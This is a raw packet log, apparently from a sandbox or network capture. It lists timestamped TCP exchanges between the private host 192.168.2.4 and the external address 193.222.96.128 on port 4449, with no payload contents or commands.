Apr 20, 2024 10:08:15.565180063 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565220118 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565258026 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565313101 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565314054 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565320969 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565314054 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565314054 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565371037 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565386057 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565422058 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565447092 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565460920 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565465927 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565500021 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565522909 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565537930 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565547943 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565586090 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565591097 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565624952 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565637112 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565668106 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.565676928 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565725088 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.746299982 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.796529055 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.809854031 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.810034990 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.998909950 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.999006033 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.999326944 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:16.065069914 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:16.202763081 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:16.210491896 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:16.463388920 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:16.762521029 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:16.762521029 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:16.964936972 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:16.964996099 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:16.965032101 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:16.965065956 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:16.965301037 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:16.966142893 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:17.012088060 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.012819052 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:17.036906958 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:17.167553902 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.167582989 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.167602062 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.167615891 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.167634010 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.167649031 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.167663097 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.167794943 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:17.168020964 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.215383053 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.215630054 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:17.293126106 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:17.293221951 CEST | 49738 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:17.369858980 CEST | 4449 | 49738 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:20.744885921 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:20.994580030 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:20.995210886 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:21.198880911 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:21.244595051 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:21.447427034 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:21.448872089 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:21.700268030 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:21.700561047 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:21.945967913 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:25.877058029 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:26.120178938 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:26.120237112 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:26.326407909 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:26.369549990 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:26.571538925 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:26.573317051 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:26.814169884 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:26.814420938 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:27.059061050 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:32.316456079 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:32.559765100 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:32.560513973 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:32.765739918 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:32.824310064 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:33.026349068 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:33.032454967 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:33.277077913 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:33.277167082 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:33.518673897 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:36.191926003 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:36.444488049 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:36.448460102 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:36.652668953 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:36.700305939 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:36.902323961 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:36.905848026 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:37.151871920 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:37.152394056 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:37.396064997 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:48.142391920 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:48.385396957 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:48.385489941 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:48.595282078 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:48.808269978 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:48.906841993 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:48.909461975 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:48.909461975 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:49.011441946 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:49.016366005 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:49.169727087 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:49.176269054 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:49.429147959 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:50.552264929 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:50.804824114 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:50.812364101 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:51.028325081 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:51.120264053 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:51.322262049 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:51.323622942 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:51.569945097 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:51.570003033 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:51.811731100 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:53.595623016 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:53.850042105 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:53.850097895 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:54.053874969 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:54.180341959 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:54.382478952 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:54.392261982 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:54.635580063 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:54.635665894 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:54.881201029 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:54.881382942 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:55.085460901 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:55.307039976 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:55.488559961 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:55.488656998 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:55.509259939 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:55.509394884 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:55.736763000 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:55.985121012 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:55.985238075 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:56.228465080 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:00.017076969 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:00.280605078 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:00.280711889 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:00.487252951 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:00.620268106 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:00.628362894 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:00.822109938 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:00.822429895 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:00.875524044 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:00.876127958 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:01.029695034 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:01.036277056 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:01.078150988 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:01.080322027 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:01.084247112 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:01.328988075 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:01.329061031 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:01.572758913 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:02.142182112 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:02.385752916 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:02.392256975 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:02.597826958 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:02.807012081 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:03.003794909 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:03.006412983 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:03.007674932 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:03.009100914 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:03.009347916 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:03.249538898 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:03.254878044 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:03.497903109 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:15.286618948 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:15.538393021 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:15.538562059 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:15.743514061 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:15.822498083 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:16.024661064 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:16.026664019 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:16.275751114 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:16.275818110 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:16.527018070 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:21.036266088 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:21.278973103 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:21.284245968 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:21.497720003 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:21.590452909 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:21.792439938 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:21.793909073 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:22.038063049 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:22.038136005 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:22.246954918 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:22.324230909 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:22.526444912 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:22.532236099 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:22.778840065 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:22.778987885 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:23.033025980 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:23.036304951 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:23.254743099 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:23.322510004 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:23.524696112 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:23.526392937 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:23.769268036 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:23.769481897 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:24.012258053 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:30.440577030 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:30.683166027 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:30.688365936 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:30.892862082 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:31.112229109 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:31.277075052 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:31.280277014 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:31.280277014 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:31.315298080 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:31.316246986 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:31.316342115 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:31.483474016 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:31.518315077 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:31.518522024 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:31.520015955 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:31.775594950 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:31.775758982 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:32.020936012 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:43.276211023 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:43.520788908 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:43.520865917 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:43.724879026 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:43.775610924 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:43.977382898 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:43.979890108 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:44.222058058 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:44.222122908 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:44.465137005 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:44.816210985 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:45.059978962 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:45.064209938 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:45.267447948 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:45.324214935 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:45.526329994 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:45.528013945 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:45.780250072 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:45.780452967 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:46.025827885 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:46.285476923 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:46.536556005 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:46.544210911 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:46.747688055 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:46.792200089 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:46.994659901 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:47.003201008 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:47.246016026 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:47.252191067 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:47.456177950 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:47.510021925 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:47.712292910 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:47.714272976 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:47.973675966 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:47.973855972 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:48.216449022 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:53.675286055 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:53.928735971 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:53.928927898 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:54.132782936 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:54.181977034 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:54.384277105 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:09:54.388019085 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:54.638042927 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
